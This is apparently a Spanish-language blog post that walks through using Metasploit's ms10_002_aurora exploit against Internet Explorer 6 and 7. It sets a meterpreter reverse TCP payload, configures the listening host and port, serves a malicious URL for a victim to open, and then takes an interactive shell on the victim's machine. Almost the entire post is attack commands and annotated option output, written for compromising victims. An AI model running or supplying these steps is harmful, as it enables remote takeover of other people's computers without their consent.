( Aviso que el exploit es para la version 6 7 de IE la 8 ya tiene actualizacion ! )
Para empezar vamos a buscar el exploit
msf >
msf > use windows/browser/ms10_002_aurora <--Seleccionamos el exploit
msf exploit(ms10_002_aurora) >
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp <--Seleccionamos un PAYLOAD, usar meterpreter para mas comodidad
msf exploit(ms10_002_aurora) > show options <--Miramos las opciones del exploit
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 <--La ip que se conectara la victima (la muestra

SRVPORT 8080 <--El puerto con el que conectara la Victima
SSL false <-- Lo dejamos por defecto
SSLVersion SSL3 <-- Lo dejamos por defecto
URIPATH <-- La ULR en la que se tendra que explorar la victima
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process <---Lo dejamos por defecto
LHOST <--<El Host de nuestro payload
LPORT 4444 <---El Puerto de nuestro payload
msf exploit(ms10_002_aurora) >
opciones del exploit
set SRVHOST xxx.xxx.xxx.xxx <--La ip que se conectara la victima (la muestra

set SRVPORT 80 <--El puerto con el que conectara la Victima
set URIPATH / <-- La ULR en la que se tendra que explorar la victima
opciones del payload en este caso solo modificamos el host y el puerto lo dejammos por defecto
set LHOST xxx.xxx.xxx.xxx
msf exploit(ms10_002_aurora) >exploit
y despues nos aparesera la ip con la que la victima tendra que abrir ejemplo
http://xxx.xxx.x.xx:8080/ <--Que seran SRVHOST y SRVPORT
Una ves que la victima entre en la direccion http://xxx.xxx.x.xx:8080/ y nos notifique el metasploit escribimos
sessions -i 1 <--Por que es la primera victima si fuera una segunda seria sessions -i 2
Meterpreter: shell
Y listo Tendremos una Shell
Esto es en la mayoria de browser del metasploit espero que les sirva salu2...
0 comentarios:
Publicar un comentario